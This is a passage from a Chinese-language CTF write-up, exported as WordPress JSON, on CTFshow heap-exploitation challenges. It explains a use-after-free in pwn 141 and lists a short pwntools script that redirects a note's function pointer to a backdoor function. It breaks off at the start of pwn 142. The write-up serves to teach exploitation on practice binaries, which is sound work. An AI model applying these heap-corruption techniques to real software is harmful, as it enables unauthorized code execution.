{"id":211,"date":"2024-12-11T23:58:32","date_gmt":"2024-12-11T15:58:32","guid":{"rendered":"http:\/\/8.141.27.105\/?p=211"},"modified":"2024-12-23T17:11:59","modified_gmt":"2024-12-23T09:11:59","slug":"ctfshow-pwn%e5%85%a5%e9%97%a8-%e5%a0%86%e5%88%a9%e7%94%a8%e9%83%a8%e5%88%86wp","status":"publish","type":"post","link":"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/11\/ctfshow-pwn%e5%85%a5%e9%97%a8-%e5%a0%86%e5%88%a9%e7%94%a8%e9%83%a8%e5%88%86wp\/","title":{"rendered":"CTFSHOW|PWN\u5165\u95e8|\u5806\u5229\u7528\u90e8\u5206WP"},"content":{"rendered":"\n<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_71 counter-hierarchy ez-toc-counter ez-toc-transparent ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">\u76ee\u5f55<\/p>\n<span class=\"ez-toc-title-toggle\"><a href=\"#\" class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" aria-label=\"Toggle Table of Content\"><span class=\"ez-toc-js-icon-con\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #f4f4f4;color:#f4f4f4\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #f4f4f4;color:#f4f4f4\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/span><\/a><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/11\/ctfshow-pwn%e5%85%a5%e9%97%a8-%e5%a0%86%e5%88%a9%e7%94%a8%e9%83%a8%e5%88%86wp\/#pwn_141%EF%BC%88%E7%AE%80%E5%8D%95UAF%EF%BC%89\" title=\"pwn 141\uff08\u7b80\u5355UAF\uff09\">pwn 141\uff08\u7b80\u5355UAF\uff09<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/11\/ctfshow-pwn%e5%85%a5%e9%97%a8-%e5%a0%86%e5%88%a9%e7%94%a8%e9%83%a8%e5%88%86wp\/#pwn_142heap_extendlibc\" title=\"pwn 142(heap extend+libc)\">pwn 142(heap extend+libc)<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/11\/ctfshow-pwn%e5%85%a5%e9%97%a8-%e5%a0%86%e5%88%a9%e7%94%a8%e9%83%a8%e5%88%86wp\/#pwn_143_house_of_force\" title=\"pwn 143 (house of force)\">pwn 143 (house of force)<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/11\/ctfshow-pwn%e5%85%a5%e9%97%a8-%e5%a0%86%e5%88%a9%e7%94%a8%e9%83%a8%e5%88%86wp\/#pwn_143%E5%8F%A6%E4%B8%80%E7%A7%8D%E8%A7%A3%E6%B3%95%E9%87%8D%E8%A6%81unlink\" title=\"pwn 143\u53e6\u4e00\u79cd\u89e3\u6cd5|\u91cd\u8981|unlink\">pwn 143\u53e6\u4e00\u79cd\u89e3\u6cd5|\u91cd\u8981|unlink<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-5\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/11\/ctfshow-pwn%e5%85%a5%e9%97%a8-%e5%a0%86%e5%88%a9%e7%94%a8%e9%83%a8%e5%88%86wp\/#pwn_144\" title=\"pwn 144\">pwn 144<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-6\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/11\/ctfshow-pwn%e5%85%a5%e9%97%a8-%e5%a0%86%e5%88%a9%e7%94%a8%e9%83%a8%e5%88%86wp\/#pwn_160%EF%BC%88%E5%A0%86%E9%A3%8E%E6%B0%B4%EF%BC%89\" title=\"pwn 160\uff08\u5806\u98ce\u6c34\uff09\">pwn 160\uff08\u5806\u98ce\u6c34\uff09<\/a><\/li><\/ul><\/nav><\/div>\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"pwn_141%EF%BC%88%E7%AE%80%E5%8D%95UAF%EF%BC%89\"><\/span>pwn 141\uff08\u7b80\u5355UAF\uff09<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p id=\"u7efff913\">\u7ecf\u5178\u83dc\u5355:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/GNY_M3@FJ2W@561S1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"476\" height=\"698\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/GNY_M3@FJ2W@561S1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-212\"  sizes=\"auto, (max-width: 476px) 100vw, 476px\" \/><\/div><\/figure>\n\n\n\n<p id=\"uc5d88aad\">add_note\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/J_O1M4ZP46634TDEYW.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"858\" height=\"732\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/J_O1M4ZP46634TDEYW.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-214\"  sizes=\"auto, (max-width: 858px) 100vw, 858px\" \/><\/div><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p id=\"u8d3d80dc\">del note\uff1afree\u5b8c\u4e0d\u60ac\u7a7a\uff0c\u6709UAF<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/S0ZK@K3MYIVIUMO90.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"737\" height=\"584\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/S0ZK@K3MYIVIUMO90.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-216\"  sizes=\"auto, (max-width: 737px) 100vw, 737px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ua4c188a9\">print_note:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/0@F5O981NSNQTAGSOC6-1024x499.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"499\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/0@F5O981NSNQTAGSOC6-1024x499.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-217\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u1a8e0a0b\">\u8fd9\u91cc\u6211\u770b\u53cd\u6c47\u7f16\u4ee3\u7801\u770b\u4e86\u597d\u4e45\u4e5f\u6ca1\u6709\u5f7b\u5e95\u641e\u61c2\uff0c\u4ece\u7f51\u4e0a\u627e\u5230\u6e90\u7801\u624d\u5f7b\u5e95\u641e\u61c2\uff1a<\/p>\n\n\n\n<p id=\"uce801f4f\"><a href=\"https:\/\/www.freebuf.com\/articles\/system\/289270.html\" target=\"_blank\" rel=\"noreferrer noopener\">Use After Free\u6f0f\u6d1e\u53ca\u5176\u5229\u7528 &#8211; FreeBuf\u7f51\u7edc\u5b89\u5168\u884c\u4e1a\u95e8\u6237<\/a><\/p>\n\n\n\n<p id=\"uf0e69fa3\">\u5148\u770baddnote<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/S33Q0C4P8MJB@7W6U0AM.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"858\" height=\"732\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/S33Q0C4P8MJB@7W6U0AM.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-218\"  sizes=\"auto, (max-width: 858px) 100vw, 858px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u3614c2c6\">\u5bf9\u6bd4\u6e90\u7801\uff0c\u989c\u8272\u76f8\u540c\u7684\u5c31\u662f\u540c\u4e00\u4ee3\u7801<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/Z3CKM0IK3ZU0BG6BRKHY.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"888\" height=\"944\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/Z3CKM0IK3ZU0BG6BRKHY.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-219\"  sizes=\"auto, (max-width: 888px) 100vw, 888px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u6c360223\">&amp;notelist+i\u5c31\u76f8\u5f53\u4e8enotelist[i],\u800c*(&amp;notelist+i)\u53ef\u4ee5\u8fd9\u4e48\u7406\u89e3:(&amp;notelist+i)\u662f\u4e00\u4e2a\u5730\u5740\uff0c*(&amp;notelist+i)=malloc(n)\uff0c*\u662f\u53d6\u8fd9\u4e2a\u5730\u5740\u5b58\u7684\u503c\uff0c\u7531\u4e8emalloc\u8fd4\u56de\u7684\u662f\u5206\u914d\u5185\u5b58\u7684\u9996\u5730\u5740\uff0c\u4e5f\u5c31\u662f(&amp;notelist+i)\u7684\u503c\u5b58\u7684\u5c31\u662f\u5206\u914d\u5185\u5b58\u7684\u9996\u5730\u5740\uff0c\u5982\u679c\u6ca1\u6709*\u53f7\uff0c\u5c31\u4f1a\u5bfc\u81f4(&amp;notelist+i)\u8fd9\u4e2a\u5730\u5740\u53d8\u6210\u4e86malloc\u5206\u914d\u7684chunk\u7684\u9996\u5730\u5740\u3002\u6bd4\u5982(&amp;notelist+i)\u662f0x8000,\u4e00\u5f00\u59cb\u5b58\u7684\u662f1\uff0c*(&amp;notelist+i)=3,\u5c31\u4f1a\u5bfc\u81f4\u5b58\u76841\u53d8\u62103\uff0c\u800c(&amp;notelist+i)=3\u5219\u662f(&amp;notelist+i)\u672c\u8eab\u53d8\u6210\u4e860x3\u3002\u53ef\u4ee5\u628a(&amp;notelist+i)\u5f53\u6210\u4e00\u4e2a\u6307\u9488p\u6765\u7406\u89e3<\/p>\n\n\n\n<p id=\"u557b456b\">notelist[i]\u662f\u4e2a\u6307\u9488\uff08\u5730\u5740\uff09\uff0c\u6307\u5411\u4e00\u4e2anote\u7ed3\u6784\u4f53\uff0c\u4e00\u4e2anote\u7ed3\u6784\u4f53\u53c8\u6709\u4e24\u4e2a\u6307\u9488\u6210\u5458\uff0c\u6307\u9488\u4e00\u6307\u5411\u4e86\u4e00\u4e2aprint_note\u51fd\u6570,\u6307\u9488\u4e8c\u6307\u5411\u7684\u5730\u5740\u5219\u5f00\u8f9f\u4e3a\u5b57\u7b26\u4e32\u3002<\/p>\n\n\n\n<p id=\"u7bd4f5f5\">\u800c\u9ec4\u8272\u6846\u6846\u7684\u4e24\u4e2a*\u53f7\uff0c\u4e5f\u7528\u540c\u6837\u65b9\u6cd5\u7406\u89e3\u3002\u628a\u4e00\u4e2a\u5730\u5740\u5f53\u6210chunk\u7684\u4e00\u4e2a\u6210\u5458\u3002\u84dd\u8272\u6846\u4e5f\u662f\u4e00\u6837\u9053\u7406\u3002<\/p>\n\n\n\n<p id=\"u83bef906\">\u6240\u4ee5\u793a\u610f\u56fe\u5982\u4e0b\uff0c\u5f53\u5728\u8fdb\u884cadd_note\u64cd\u4f5c\u65f6\uff0c\u5b9e\u9645\u4e0a\u7533\u8bf7\u4e86\u4e24\u6b21malloc:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/V3O9MO6N99XLNTJ7ZU9GQG-1024x430.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"430\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/V3O9MO6N99XLNTJ7ZU9GQG-1024x430.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-220\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ub2a793ff\">\u540c\u65f6\uff0c\u53d1\u73b0\u9898\u76ee\u6709\u540e\u95e8\u51fd\u6570\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/RMI1TRHWOCOROG6_SNS.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"503\" height=\"215\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/RMI1TRHWOCOROG6_SNS.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-221\"  sizes=\"auto, (max-width: 503px) 100vw, 503px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u75f17f91\">\u5f53\u6211\u4eec\u7533\u8bf7\u4e00\u4e2achunk\u65f6\uff0c\u80fd\u591f\u6539\u5199\u7684\u53ea\u6709\u6307\u9488p2\u4e5f\u5c31\u662fcontent\u6210\u5458\uff0c\u90a3\u5982\u4f55\u7528UAF\u505a\u5230\u80fd\u4fee\u6539\u6307\u9488p1\u5462\uff1f<\/p>\n\n\n\n<p id=\"u48a3ad7a\">\u5982\u679c\u5148\u7533\u8bf7\u4e00\u4e2achunk1\u7136\u540efree\u6389\uff0c\u518d\u7533\u8bf7\u4e00\u4e2achunk2\uff0c\u628acontent\u7533\u8bf7\u7684\u5927\u5c0f\u6539\u6210chunk1\u5927\u5c0f\uff0c\u80fd\u4e0d\u80fd\u7533\u8bf7\u5230chunk1\u7684\u5730\u5740\u5462\uff1f\u7b54\u6848\u662f\u4e0d\u884c\uff0c\u56e0\u4e3a\u7533\u8bf7chunk2\u672c\u4f53\u65f6\u5019\u5c31\u4f1a\u628achunk1\u7ed9\u5b83\uff0c\u518d\u7533\u8bf7chunk2\u7684content\u5b57\u6bb5\u65f6\u5019\u5c31\u4f1a\u53e6\u7ed9\u4e86<\/p>\n\n\n\n<p id=\"uc4d0a7be\">\u90a3\u5c31\u5f88\u5bb9\u6613\u60f3\u5230\uff0c\u6211\u7533\u8bf7\u4e24\u4e2a\u5462\uff1f<\/p>\n\n\n\n<p id=\"ue5c8d4b3\">\u5148\u7533\u8bf7chunk1\uff0c\u518d\u7533\u8bf7chunk2\uff0c\u4f9d\u6b21free\u6389\uff0c\u6b64\u65f6fastbin\u91cc\u9762\u5c31\u6709chunk1\u548cchunk2\uff0c\u7136\u540e\u6211\u518d\u7533\u8bf7chunk3,\uff08\u7531\u4e8efastbin\u5148\u8fdb\u540e\u51fa\uff09\uff0cchunk3\u7684\u672c\u4f53\u5c31\u4f1a\u62ff\u5230chunk2\u7684\u5185\u5b58\uff0c\u7136\u540e\u7533\u8bf7chunk3\u7684content\u5b57\u6bb5\u8ddfchunk\u7ed3\u6784\u4f53\u5927\u5c0f\u4e00\u6837\uff088bytes\uff09\u7684\u8bdd\uff0c\u5c31\u4f1a\u628achunk1\u7684\u5185\u5b58\u5206\u914d\u7ed9\u5b83\uff01<\/p>\n\n\n\n<p id=\"u2c95b504\">\u6240\u4ee5\u6b64\u65f6\u4fee\u6539chunk3\u7684content\u5c31\u662f\u4fee\u6539chunk1\uff0c\u6539\u524d\u56db\u5b57\u8282\u4e3a\u540e\u95e8\u51fd\u6570\u7684\u5730\u5740\uff0c\u8c03\u7528print_note\uff0c\u5c31\u4f1a\u8c03\u7528\u540e\u95e8\u51fd\u6570\uff0c\u6210\u529f\u62ff\u5230flag<\/p>\n\n\n\n<p id=\"u8cb085ca\">exp\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/86S1HYQ9UABGS8GKV.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"735\" height=\"690\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/86S1HYQ9UABGS8GKV.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-222\"  sizes=\"auto, (max-width: 735px) 100vw, 735px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u2cb7352a\">add(16, &#8220;aaaa&#8221;)<\/p>\n\n\n\n<p id=\"u159853bf\">add(16, &#8220;aaaa&#8221;)<\/p>\n\n\n\n<p id=\"ubdd3ccd8\">delete(0)<\/p>\n\n\n\n<p id=\"u7ff07a42\">delete(1)<\/p>\n\n\n\n<p id=\"u675e075e\">add(8, p32(use))<\/p>\n\n\n\n<p id=\"u69633e49\">show(0)<\/p>\n\n\n\n<p id=\"u1f9dbe6a\">io.intera<\/p>\n\n\n\n<p id=\"u7ca03a1b\">\u6ce8\u610f\uff0cchunk1\u548cchunk2\u7684content\u5927\u5c0f\u6309\u7406\u6765\u8bf4\u662f\u53ef\u4ee5\u968f\u4fbf\u586b\u7684\uff0c\u53ea\u8981\u4e0d\u662fchunk\u672c\u8eab\u5927\u5c0f\u5c31\u884c\u4e86\uff0c\u4f46\u662f\u5b9e\u9645\u4e0a\u4e5f\u4f1a\u6709\u4e00\u5b9a\u8303\u56f4\u9650\u5236\uff08&gt;12\uff09,\u800c\u4e14chunk3\u7684content\u4e5f\u4e0d\u4e00\u5b9a\u5fc5\u987b\u7b49\u4e8e8\uff0c&gt;=4\u90fd\u53ef\u4ee5\uff0c\u5177\u4f53\u539f\u56e0\u672a\u77e5<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/MXP8DZ3U5X43ODUD.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"693\" height=\"455\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/MXP8DZ3U5X43ODUD.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-224\"  sizes=\"auto, (max-width: 693px) 100vw, 693px\" \/><\/div><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"pwn_142heap_extendlibc\"><\/span>pwn 142(heap extend+libc)<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/SILO80TK@N5X8@J9.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"969\" height=\"852\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/SILO80TK@N5X8@J9.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-227\"  sizes=\"auto, (max-width: 969px) 100vw, 969px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ua2530c7a\">1\u662f\u521b\u5efa\u5806<\/p>\n\n\n\n<p id=\"u5b6e375a\">2\u662f\u7f16\u8f91\u5806<\/p>\n\n\n\n<p id=\"u9debf8dd\">3\u662f\u6253\u5370\u5806<\/p>\n\n\n\n<p id=\"u23654a70\">4\u662f\u5220\u9664\u5806<\/p>\n\n\n\n<p id=\"u338180d3\">\u5148\u770b1\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/5322G2R_QBIU8XNB2ZC5.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"998\" height=\"908\" 